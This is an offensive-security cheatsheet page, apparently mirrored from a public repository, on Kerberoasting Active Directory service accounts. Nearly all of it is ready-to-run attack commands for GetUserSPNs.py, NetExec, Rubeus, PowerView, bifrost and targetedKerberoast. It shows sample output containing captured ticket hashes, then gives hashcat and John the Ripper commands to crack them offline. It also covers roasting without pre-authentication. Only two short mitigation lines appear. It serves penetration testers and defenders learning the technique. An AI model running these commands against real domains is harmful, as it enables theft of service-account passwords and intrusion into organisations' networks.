daemon-sec-cheatsheet

The cheatsheet vault for operators: AD, enumeration, exploitation, priv-esc, web, DFIR
git clone https://git.daemon-sec.xyz/daemon-sec-cheatsheet.git
Log | Files | Refs | README | LICENSE

ad-roasting-kerberoasting.md (5972B)


      1 ---
      2 title: "Roasting - Kerberoasting"
      3 section: "Active Directory"
      4 sectionSlug: "active-directory"
      5 sourcePath: "docs/active-directory/ad-roasting-kerberoasting.md"
      6 sourceUrl: "https://github.com/swisskyrepo/InternalAllTheThings/blob/203bb0c0b290/docs/active-directory/ad-roasting-kerberoasting.md"
      7 sha: "203bb0c0b290"
      8 isIndex: false
      9 ---
     10 
     11 # Roasting - Kerberoasting
     12 
     13 > "A service principal name (SPN) is a unique identifier of a service instance. SPNs are used by Kerberos authentication to associate a service instance with a service logon account. " - [MSDN](https://docs.microsoft.com/fr-fr/windows/desktop/AD/service-principal-names)
     14 
     15 Any valid domain user can request a kerberos ticket (ST) for any domain service. Once the ticket is received, password cracking can be done offline on the ticket to attempt to break the password for whatever user the service is running as.
     16 
     17 * [SecureAuthCorp/impacket/GetUserSPNs.py](https://github.com/SecureAuthCorp/impacket/blob/master/examples/GetUserSPNs.py) from Impacket Suite
     18 
     19   ```powershell
     20   GetUserSPNs.py active.htb/SVC_TGS:GPPstillStandingStrong2k18 -dc-ip 10.10.10.100 -request
     21 
     22   Impacket v0.9.17 - Copyright 2002-2018 Core Security Technologies
     23 
     24   ServicePrincipalName  Name           MemberOf                                                  PasswordLastSet      LastLogon           
     25   --------------------  -------------  --------------------------------------------------------  -------------------  -------------------
     26   active/CIFS:445       Administrator  CN=Group Policy Creator Owners,CN=Users,DC=active,DC=htb  2018-07-18 21:06:40  2018-12-03 17:11:11 
     27 
     28   $krb5tgs$23$*Administrator$ACTIVE.HTB$active/CIFS~445*$424338c0a3c3af43[...]84fd2
     29   ```
     30 
     31 * [Pennyw0rth/NetExec](https://github.com/Pennyw0rth/NetExec)
     32 
     33   ```powershell
     34   netexec ldap 10.0.2.11 -u 'username' -p 'password' --kdcHost 10.0.2.11 --kerberoast output.txt
     35   LDAP        10.0.2.11       389    dc01           [*] Windows 10.0 Build 17763 x64 (name:dc01) (domain:lab.local) (signing:True) (SMBv1:False)
     36   LDAP        10.0.2.11       389    dc01           $krb5tgs$23$*john.doe$lab.local$MSSQLSvc/dc01.lab.local~1433*$efea32[...]49a5e82$b28fc61[...]f800f6dcd259ea1fca8f9
     37   ```
     38 
     39 * [GhostPack/Rubeus](https://github.com/GhostPack/Rubeus)
     40 
     41   ```powershell
     42   # Stats
     43   Rubeus.exe kerberoast /stats
     44   -------------------------------------   ----------------------------------
     45   | Supported Encryption Type | Count |  | Password Last Set Year | Count |
     46   -------------------------------------  ----------------------------------
     47   | RC4_HMAC_DEFAULT          | 1     |  | 2021                   | 1     |
     48   -------------------------------------  ----------------------------------
     49 
     50   # Kerberoast (RC4 ticket)
     51   Rubeus.exe kerberoast /creduser:DOMAIN\JOHN /credpassword:MyP@ssW0RD /outfile:hash.txt
     52 
     53   # Kerberoast (AES ticket)
     54   # Accounts with AES enabled in msDS-SupportedEncryptionTypes will have RC4 tickets requested.
     55   Rubeus.exe kerberoast /tgtdeleg
     56 
     57   # Kerberoast (RC4 ticket)
     58   # The tgtdeleg trick is used, and accounts without AES enabled are enumerated and roasted.
     59   Rubeus.exe kerberoast /rc4opsec
     60   ```
     61 
     62 * [PowerShellMafia/PowerSploit/PowerView.ps1](https://github.com/PowerShellMafia/PowerSploit/blob/master/Recon/PowerView.ps1)
     63 
     64   ```powershell
     65   Request-SPNTicket -SPN "MSSQLSvc/dcorp-mgmt.dollarcorp.moneycorp.local"
     66   ```
     67 
     68 * [its-a-feature/bifrost](https://github.com/its-a-feature/bifrost) on **macOS** machine
     69 
     70   ```powershell
     71   ./bifrost -action asktgs -ticket doIF<...snip...>QUw= -service host/dc1-lab.lab.local -kerberoast true
     72   ```
     73 
     74 * [ShutdownRepo/targetedKerberoast](https://github.com/ShutdownRepo/targetedKerberoast)
     75 
     76   ```powershell
     77   # for each user without SPNs, it tries to set one (abuse of a write permission on the servicePrincipalName attribute), 
     78   # print the "kerberoast" hash, and delete the temporary SPN set for that operation
     79   targetedKerberoast.py [-h] [-v] [-q] [-D TARGET_DOMAIN] [-U USERS_FILE] [--request-user username] [-o OUTPUT_FILE] [--use-ldaps] [--only-abuse] [--no-abuse] [--dc-ip ip address] [-d DOMAIN] [-u USER] [-k] [--no-pass | -p PASSWORD | -H [LMHASH:]NTHASH | --aes-key hex key]
     80   ```
     81 
     82 Then crack the ticket using the correct hashcat mode (`$krb5tgs$23`= `etype 23`)
     83 
     84 | Mode    | Description                                           |
     85 | ------- | ----------------------------------------------------- |
     86 | `13100` | Kerberos 5 TGS-REP etype 23 (RC4)                     |
     87 | `19600` | Kerberos 5 TGS-REP etype 17 (AES128-CTS-HMAC-SHA1-96) |
     88 | `19700` | Kerberos 5 TGS-REP etype 18 (AES256-CTS-HMAC-SHA1-96) |
     89 
     90 ```powershell
     91 ./hashcat -m 13100 -a 0 kerberos_hashes.txt crackstation.txt
     92 ./john --wordlist=/opt/wordlists/rockyou.txt --fork=4 --format=krb5tgs ~/kerberos_hashes.txt
     93 ```
     94 
     95 ## Kerberoasting Without Pre-Authentication
     96 
     97 > If an attacker knows of an account for which pre-authentication isn’t required (i.e. an ASREProastable account), as well as one (or multiple) service accounts to target, a Kerberoast attack can be attempted without having to control any Active Directory account (since pre-authentication won’t be required).
     98 
     99 ```ps1
    100 netexec ldap 10.10.10.10 -u username -p '' --no-preauth-targets users.txt --kerberoasting output.txt
    101 ```
    102 
    103 ## Mitigations
    104 
    105 * Have a very long password for your accounts with SPNs (> 32 characters)
    106 * Make sure no users have SPNs
    107 
    108 ## References
    109 
    110 * [Abusing Kerberos: Kerberoasting - Haboob Team](https://www.exploit-db.com/docs/english/45051-abusing-kerberos---kerberoasting.pdf)
    111 * [Invoke-Kerberoast - Powersploit Read the docs](https://powersploit.readthedocs.io/en/latest/Recon/Invoke-Kerberoast/)
    112 * [Kerberoasting - Part 1 - Mubix “Rob” Fuller](https://room362.com/post/2016/kerberoast-pt1/)
    113 * [Post-OSCP Series Part 2 - Kerberoasting - 16 APRIL 2019 - Jon Hickman](https://0metasecurity.com/post-oscp-part-2/)
    114 * [Training - Attacking and Defending Active Directory Lab - Altered Security](https://www.alteredsecurity.com/adlab)